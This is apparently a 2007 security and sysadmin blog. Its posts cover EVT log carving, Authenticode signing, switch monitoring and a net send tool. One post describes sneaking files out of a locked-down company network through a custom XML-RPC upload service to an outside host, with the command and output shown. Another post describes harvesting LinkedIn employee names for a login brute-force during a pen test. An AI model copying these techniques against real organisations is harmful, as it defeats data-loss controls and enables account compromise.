Recovering Windows EVT with Foremost

June 29, 2007

For my forensic needs I am definitely sticking with Linux as a platform. Besides great TSK toolset, I can use foremost
for data carving ( extraction ). BTW, I read that foremost is now available on windows as well.

I had an image from a windows XP machine which was badly damaged and could not be mounted. I needed to recover event logs ( the *evt files ) from it. Since the logs are binary, and Unicode or ASCII search would have not turned up anything, I used foremost tool on Linux.

The hex signature of the evt file is :

\x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00

Knowing this, I have constructed a formost config file notifying the tool of how exactly I wanted the data carved. With the following configuration in the /usr/local/etc/foremost.conf.evt config file:

evt y 512000 \x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00

the tool will search for a signature and recover at most 512000 bytes, which should be enough to read evt with some custom python script or use fccu.evtreader.pl ( http://www.d-fence.be ).

So, the recovery goes like that:
1. Construct recovery command for foremost:

$ foremost -v -T -c /usr/local/etc/foremost.conf.evt -t all -i /z/image.dd

This will extract a binary evt file ( like 00000000.evt ) from the image.dd

2. Run

$ fccu.evtreader.pl 00000000.evt

and get ascii lines back for further processing.

Harvesting Reconnaissance Info via Linked-in

June 10, 2007

Someone I haven;t talked to for a long time sent me a linked-in ( http://www.linkedin.com ) request the other day, and I went to update my long-outstanding profile. For those who have not used Linked-in – it’s an online network of people you want to keep in contact with; and find/expand your relationships with people your contacts know.

At the time I was preparing to pen-test a company;s PeopleSoft web interface to Accounts Payable/ Accounts Receivable stuff. Of course, there was no correlation between these 2 activities except for the fact that Linked-in made my recon phase of the test that much easier. This wonderful site allowed me to generate a dictionary of possible first and last names of people currently working for the company. Given the fact and some other clues, I was able to infer user login policy to the Website interface. :) All I had to do is search for current employees of the particular company. Forget Monster profiles ( who knows how updated they are ). Forget searching for emails on Google. Login to Linked -in and having at least one sufficiently connected peer in your network( 500 references in my case ), I was able to find 145 people currently working for the company. Of them, 18 were execs and 34 were technical people with resumes reflecting technology they worked on at the company.

Needless to say the dictionary of first/last names were fed into brute-forcer against the web interface I was testing. 20 minutes later I got “Password invalid” for a valid user…. Interestingly enough, the valid user turned out to be an HR guy who never changed his password.

I wonder if anyone had taken it further to do some social engineering stuff :) ?

Bypassing firewalls with XML-RPC

June 10, 2007

I know… Lots of people are talking about insecure webservices nowadays. Until recently I didn;t have much to do with it. However, I was in one quite secure environment the other week, and had to transfer my own utility I wrote outside the company. I also needed to transfer a video of the utility in-action outside.

A lot of “normal” ways of transferring data from the company were already restricted, including ssh, mail attachments, and even USB and CDROMs were locked. So, I had to really either print the source code and retype it later or come up with a way to transfer files reliably. Proxy servers did not allow access to the usual upload facilities like Rapidshare, etc. One option was to connect via port 80 somewhere and upload the file…. The company allowed only POST and GET egress. Pain in the butt… :) or …. good security…. :) unfortunately visits to my home page were prohibited by Websense under “Personal homepages” policy. Not much to do. So thinking more about it, I decided to take down my home site, and mount an XML-RPC service on port 80 instead. Tweaking things here and there, it looked promising. Here’s a client and server I wrote to finally copy binary/text files via my webservice. I based it on Twisted Python – great stuff.


dimas@moo ~/scripts/python/twisted $ ls -l ~/Desktop/video.wmv
-rw-r--r-- 1 dimas dimas 7732360 May 14 16:37 /home/dimas/Desktop/video.wmv

dimas@moo ~/scripts/python/twisted $ ./xmlrpc_client.py ~/Desktop/video.wmv ‘http://externalsite:80′
[c]Preparing for service at: http://externalsite:80
[c]Connected to http://externalsite:80
[c]Uploading file /home/dimas/Desktop/video.wmv
[c]Client digest:1a0444dff540bd641d23d28e21288804e6fd0735
[s]Server digest:1a0444dff540bd641d23d28e21288804e6fd0735
[c]File upload status: UPLD_OK

It was a success. XML-RPC calls went undetected ( or at least not prevented ). Also, if anyone visits externalsite:80 they will not see the usual upload page… which is always better :) anyways.

Here is the code. I checksum the data with sha-1, base64 -encode it on one end and reverse it on the other.

XML-RPC twisted client

XML-RPC twisted server

So, really, how are people going to fix this? Unless they do some really intelligent packet inspection and know business logic, it’s hard to do. The XML-RPC clients/servers are mostly custom within organisations, and one needs to educate the parsing software of the proper rules.

Local Certificate Authority for MS Authenticode

June 6, 2007

I needed a fast and scriptable way of signing local binaries. Those “tools” would be distributed around the department, and had to be accepted and run by others. I looked at Microsoft MSH ( powershell ? ) to see if it can help, and it did…. The following procedure was rolled into a script and automated.

Prerequisites I needed

1. Install .Net Framework 2.0
2. Install MSH windows shell
3. Install .Net Development SDK

Note: in this example SRVR ( W2k3 ) server is used as local CA
and ACCT as admin account to run under

Procedure I followed:

1. Login to SRVR as ACCT account
2. Start->Run : type msh

I. Make certificate Authority ( Only one time )

## Create certificate Authority keypair and certificate
MSH> makecert -n “CN=Company Local CA2, O=CompanyBuild, C=US, S=Illinois, O=Company, OU=Chicago” -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv root.pvk root.cer -ss Root -sr localMachine
Succeeded

## Check if it was created
MSH> get-childitem cert:\localmachine\root

Subject : CN=Company Local CA2, O=Company Build,
C=US, S=Illinois, O=Company, OU=Chicago
Issuer : CN=Company Local CA2, O=Company Build,
C=US, S=Illinois, O=Company, OU=Chicago
Thumbprint : FCD5D33001132C770CF0627424B1F2

1E9EECD6DD

FriendlyName :
NotBefore : 3/22/2007 3:11:15 PM
NotAfter : 12/31/2039 5:59:59 PM
Extensions : {System.Security.Cryptography
.Oid,
System.Security.Cryptography
.Oid}

II. Make Certificate signing Authority ( only one time )

## Create signing authority and sign the certificate by local CA
MSH> makecert -pe -n “CN=Company Local CA2 Signing Validation,
O=Company Build, C=US, S=Illinois OU=Chicago” -ss CF -a
sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer

Succeeded

## Check it was created
MSH> get-childitem cert:\currentuser\CF

Subject : CN=Company Local CA2 Signing Validation,
O=Company Build, C=US, S=”Illinois OU=Chicago”
Issuer : CN=Company Local CA2, O=Company Build,
C=US, S=Illinois, O=Company, OU=Chicago
Thumbprint : E748B0B01AFA1B3CC27B268E7FEB26
98D6FA6B95
FriendlyName :
NotBefore : 3/22/2007 3:19:02 PM
NotAfter : 12/31/2039 5:59:59 PM
Extensions : {System.Security.Cryptography
.Oid,
System.Security.Cryptography
.Oid}

III Sign a file ( every time )

## In case you have multiple CAs installed, select the one certificate
you need ( array element )
MSH> $cert=(get-childitem cert:\currentuser\CF)[1]

## Sign EXE/CAB/DLL/MSH files
MSH> set-authenticodeSignature “c:\Tools\fport\Fport-2.0\fport.exe” $cert

SignerCertificate : [Subject]
CN=Company Local CA2 Signing
Validation, O=Company Build, C=US, S=”Illinois
OU=Chicago”

[Issuer]
CN=Company Local CA2,
O=Company Build, C=US, S=Illinois, O=Company,
OU=Chicago

[Serial Number]
DB0F9C8A691755074AAF551F570DE4
E5

[Not Before]
3/22/2007 3:19:02 PM

[Not After]
12/31/2039 5:59:59 PM

[Thumbprint]
E748B0B01AFF1B5FC27B268E7FEB26
98D6FA6B95

TimeStamperCertificate :
Status : Valid
StatusMessage : Signature verified.
Path : C:\Tools\fport\Fport-2.0\fport.exe

IV Test and distribute the signed file

 

 

(Old) Brocade switch performance monitoring

June 6, 2007

Why do I get old hardware … :) Brocade 2800 16-port switch does not support ssh to manage, and there’s no decent reporting. But it’s very affordable and solid for an entry level FC tweaking. It’s really not meant to support production anymore ( perfromance-wise) :) But some people have no choice, and run Oracle on it. Here’s how I got to collecting performance stats from it and report almost as granular ( 15 sec ) as I could.

The cron entries:

### San switch 1
00,05,10,15,20,25,30,35,40,45,50,55 * * * *
/usr/local/scripts/monitoring/BrocadePortPerf.pl –switch=10.4.15.202
–collog=/var/log/collect/sanportstats >> /var/log/brocadeperf.sw1.log 2>&1

### San switch 2
00,05,10,15,20,25,30,35,40,45,50,55 * * * *
/usr/local/scripts/monitoring/BrocadePortPerf.pl –switch=10.4.15.203
–collog=/var/log/collect/sanportstats >> /var/log/brocadeperf.sw2.log 2>&1

### San port layout
00 6 * * * /usr/local/scripts/monitoring/wwn2port.pl –switch=10.4.15.202
–switch=10.4.15.203 >>/var/log/wwwn2port.pl.log 2>&1

##### Generate San Port Performance graphs
10 * * * * /usr/local/scripts/monitoring/generateAll4Day.sh >>
/var/log/generateAll4Day.sh.log 2>&1

And the respective scripts:

Brocade port performance collector BrocadePortPerf.pl

Web stats generator GenPortStats.pl

WWN2Port converter wwn2port.pl

The web frontend is fed from the collected information such as :

epoch time|humandate|ip:port|stats 15 second interval|(M)aximum, (A)verage for the past interval

1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port6 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port1 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port9 | 0.01:0.01:0.25:0.01:0.03:0.26:0.08:0.26:0.03:0.34:0.02:0.27:0.27:0.00:0.00:0.02 | M=0.34, A=0.12

Web looks like Date –> IP –> Port –> Max/Average like so:

Brocade switch port performance

Avoiding Netsend broadcast

June 6, 2007

Here’s a small utility to send net send messages to recipients by IP block avoiding broadcast/multicast.
Usage: netsend.pl --iptype={subnet|address} [--verbose] <address|subnet>
Please fill subnet in form of CIDR : X.X.X.X/XX

At the end of the run it gives a summary of Ips delivered/failed. I have created it to overcome one problem in an environment where messages to users were sent via net send ( manually ! ).

Since I was at it, CGI interface is included as well.

As I think of it, this may be used as footprinting workstations being able to receive the messages. I should try that next time :)

P.S. I cannot upload tarball :( So I have scanned 3 files:

Netsend.pl netsend.pl

Netsend.cgi netsend.cgi and

Netsend.lgr netsend.lgr in PDF format.


Follow

Get every new post delivered to your Inbox.